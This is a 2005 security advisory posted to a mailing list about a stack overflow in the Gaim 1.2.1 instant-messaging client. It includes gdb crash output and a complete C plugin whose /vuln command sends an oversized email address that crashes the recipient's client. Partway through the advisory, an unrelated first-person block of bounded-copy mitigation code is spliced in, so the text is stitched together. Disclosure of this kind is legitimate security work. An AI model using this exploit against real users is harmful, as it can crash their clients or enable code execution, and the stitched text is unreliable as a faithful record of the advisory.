[EXPL] Gaim Stack Overflow (PoC)

Subject: [EXPL] Gaim Stack Overflow (PoC)
Date: 15 May 2005 19:02:26 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  Gaim Stack Overflow (PoC)
------------------------------------------------------------------------


SUMMARY

" <http://gaim.sourceforge.net/> Gaim is a multi-protocol instant 
messaging (IM) client for Linux, BSD, MacOS X, and Windows. It is 
compatible with AIM and ICQ (Oscar protocol), MSN Messenger, Yahoo!, IRC, 
Jabber, Gadu-Gadu, SILC, GroupWise Messenger, and Zephyr networks."

A stack overflow vulnerability exists in Gaim; exploiting it can lead to a 
denial of service or, potentially, arbitrary code execution.

DETAILS

Vulnerable Systems:
 * Gaim version 1.2.1

Ron was looking at the stack overflow reported in Gaim 1.2.1. It was 
actually pretty trivial to find. The line that contains it looks like 
this:
strcpy(url_buf, gurl_buf->str);
url_buf is an 8192-byte buffer, and gurl_buf->str is an email address that 
is being displayed (user controlled).

The difficulty in writing a real exploit is that the input is sanitized, 
so any character over 128, as well as ' ', ',', '\n', '<', and others are 
stripped away. This doesn't leave much to play with, although it would be 
possible to write an exploit under these conditions.

Another difficulty is that most chat protocols limit you to a reasonable 
message size, and 8192 is typically well above that size. So even if you 
could successfully create an exploit, you would still have to do it on a 
chat protocol that allows very long messages. The final difficulty is that 
you also process the URL locally, when you send it, but that's not really 
a big deal. It would be trivial to filter it out in a plugin to make sure 
you don't crash yourself.
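As an added example (not part of the advisory and not Gaim's code), the pattern described above, an unbounded strcpy into a fixed 8192-byte url_buf, is replaced by a bounded copy that rejects any address that does not fit, and is exercised with a constructed address shaped like the PoC's 10002-character one. The functions copy_bounded, make_poc_address, try_copy and oversized_address_is_rejected are my own names.

```c
#include <stdlib.h>
#include <string.h>
#define URL_BUF_SIZE 8192   /* the size of url_buf in the advisory */
/* Bounded replacement for "strcpy(url_buf, gurl_buf->str)": refuses anything
 * that does not fit with its terminator and never reads or writes past buf_size. */
int copy_bounded(char *url_buf, size_t buf_size, const char *addr)
{
    size_t len = 0;
    if (buf_size == 0) return 0;
    while (len < buf_size && addr[len] != '\0')   /* stop at the bound */
        len++;
    if (len >= buf_size) {                         /* too long: empty string */
        url_buf[0] = '\0';
        return 0;
    }
    memcpy(url_buf, addr, len + 1);
    return 1;                                      /* copied verbatim */
}

/* Constructed input shaped like the PoC: total_len bytes of 'A' with '@' at
 * index 1, so it survives the character filter the advisory describes (bytes
 * >= 128, space, comma, newline, '<' stripped) but dwarfs the 8192-byte buffer. */
char *make_poc_address(size_t total_len)
{
    char *s = total_len < 2 ? NULL : malloc(total_len + 1);
    if (s == NULL) return NULL;
    memset(s, 'A', total_len);
    s[1] = '@';
    s[total_len] = '\0';
    return s;                                      /* caller frees */
}

/* Copies addr into a stack buffer of the advisory's size. Returns 1 if copied
 * verbatim, 0 if rejected with the buffer left empty, -1 on any other outcome. */
int try_copy(const char *addr)
{
    char url_buf[URL_BUF_SIZE];
    if (copy_bounded(url_buf, sizeof url_buf, addr))
        return strcmp(url_buf, addr) == 0 ? 1 : -1;
    return url_buf[0] == '\0' ? 0 : -1;
}

/* The 10002-character address from the advisory must be rejected, not copied. */
int oversized_address_is_rejected(void)
{
    char *addr = make_poc_address(10002);
    int result = addr ? try_copy(addr) : -1;
    free(addr);
    return result == 0;
}
```

The length check is the mitigation the character filter does not provide: stripping bytes never shortens a 10002-character input below 8192.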

For this example, Ron just threw together a quick plugin (based on an old 
plugin he wrote, which is why it's such a mess) that sends a 
10002-character email address when the user types "/vuln". Gaim crashes at 
the address 0x41414141.

(gdb) run
Starting program: /usr/local/bin/gaim
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 24908)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 24908)]
0x41414141 in ?? ()

Proof of Concept:
// Written by Ron <iago@valhallalegends.com>
// Friday, May 13, 2005
//
// This is a very weak demonstration of Gaim 1.2.1's stack overflow vulnerability
// when processing email addresses. What this basically does is segfault you when you
// do a /vuln command in a conversation, and, if you're using a protocol that allows
// a 10002-character message to go through, also segfaults the person you sent it to.
// The reason is that gaim's stack is overwritten with a whole bunch of 'A's, and
// the return address of the function ends up at 0x41414141. That's no good for
// anybody.
//
// This code should be considered public domain, and is freely modifiable/distributable
// by any and everyone.
//
// Note:
// To compile, place this in the "plugins" directory of Gaim's source
// (gaim-1.2.1/plugins) and type "make vuln-plugin.so". This will compile vuln-plugin.so.
// Then put it in ~/.gaim/plugins, restart gaim, and load it as a plugin.

#include <unistd.h>
#include <ctype.h>
#include <string.h>
#include <locale.h>
#include <stdio.h>
#include <stdlib.h>

#include "internal.h"
#include "gtkgaim.h"

#include "debug.h"
#include "signals.h"
#include "util.h"
#include "version.h"
#include "cmds.h"
#include "conversation.h"

#include "gtkplugin.h"
#include "gtkutils.h"

#define ME "1.2.1 Vuln Check"
#define MAXLENGTH 1024
#define XMMS_PLUGIN_VERSION "I am a test plugin to check for URL encoding vulnerability."

static GaimCmdId cmd;

/* Payload sent by /vuln; the 10002-character address is abbreviated in this listing. */
char *code = "A@AAAA...(A*8192)...AAAAA";

/* Handler for the /vuln command: sends the oversized address as an IM. */
gboolean go(GaimConversation *conv, const gchar *cmd, gchar **args, gchar **error, void *data)
{
 gaim_conv_im_send(GAIM_CONV_IM(conv), code);

 return GAIM_CMD_STATUS_OK;
}

/* Registers the /vuln command when the plugin is loaded. */
static gboolean plugin_load(GaimPlugin *plugin)
{
 cmd = gaim_cmd_register("vuln", "", GAIM_CMD_P_DEFAULT, GAIM_CMD_FLAG_IM,
                         NULL, (GaimCmdFunc)go, "/vuln", NULL);

 return TRUE;
}

/* Removes the /vuln command when the plugin is unloaded. */
static gboolean plugin_unload(GaimPlugin *plugin)
{
 gaim_cmd_unregister(cmd);

 return TRUE;
}

static GaimPluginInfo info =
{
 GAIM_PLUGIN_MAGIC,
 GAIM_MAJOR_VERSION,
 GAIM_MINOR_VERSION,
 GAIM_PLUGIN_STANDARD, /**< type */
 NULL, /**< ui_requirement */
 0, /**< flags */
 NULL, /**< dependencies */
 GAIM_PRIORITY_DEFAULT, /**< priority */
 NULL, /**< id */
 N_("1.2.1 Email Overflow Demo"), /**< name */
 VERSION, /**< version */
         /** summary */
 N_(""),
         /** description */
 N_(""),
 "Ron <iago@valhallalegends.com>", /**< author */
 "", /**< homepage */

 plugin_load, /**< load */
 plugin_unload, /**< unload */
 NULL, /**< destroy */

 NULL, /**< ui_info */
 NULL, /**< extra_info */
 NULL,
 NULL
};


static void init_plugin(GaimPlugin *plugin)
{
}

GAIM_INIT_PLUGIN(XMMSPlugin, init_plugin, info)


ADDITIONAL INFORMATION

The information has been provided by Ron <mailto:iago@valhallalegends.com>.


